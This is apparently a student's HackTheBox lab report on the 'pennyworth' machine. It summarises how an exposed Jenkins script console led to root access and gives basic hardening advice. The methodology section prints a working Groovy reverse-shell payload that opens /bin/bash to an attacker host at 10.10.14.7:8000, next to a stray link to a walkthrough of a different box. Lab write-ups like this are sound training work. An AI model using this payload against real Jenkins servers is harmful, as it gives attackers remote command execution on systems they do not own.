Week 3 HTB Report pennysworth

Report by Rowen
 Table of Contents
Pen Test:
Intro and Objective
Introduction
Objective
Report – high level summary
High level summary
Recommendations
Report – Methodologies
 Introduction and Objective
Introduction
This document provides comprehensive and detailed documentation
outlining the steps taken to penetrate the security and resilience of the target known
as "pennyworth." Throughout this guide, we will cover various measures and best
practices aimed at fortifying the machine against potential vulnerabilities and
security threats.

Objective
The objective of the penetration test is to discover and exploit vulnerabilities
in the machine with the main target being to gain access to machine and gain
administrator privileges. However, this is not for malicious purpose as the scope of
this test is to demonstrate the process used in a concise manner while also
explaining any steps or best practices to be taken to patch or monitor the associated
vulnerabilities to secure the target machine.
 Report: High level summery

Summery
I was tasked with performing the Pen test against the target on the HTB
network. The test serves as a simulated attack against this specific machine.
Initially I scanned the machine to see what ports were open and what was running.
Enumerating the site pulls up a Jenkins server login but one can still access other
pages by manipulating the site address and seeing what information that the server
has but ther4e was a script console where we can execute a reverse shell and gain
access to the machine on the root level.
Recommendations
Change default passwords and put a lock or move the script console so that
it is harder to gain access to. The other thing is hiding or filtering your ports so
they accept traffic only from where you want it to some form. Also logging and
auditing of the logs would also help prevent this from happening again.
 Report – Methodologies
First we scan the target
(couldn’t install gobuster)
https://medium.com/@ucihamadara/oopsie-hackthebox-walktrough-dd3118051d28
tring host="10.10.14.7";

int port=8000;

String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket

s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),
si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!
s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0
)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e)
{}};p.destroy();s.close();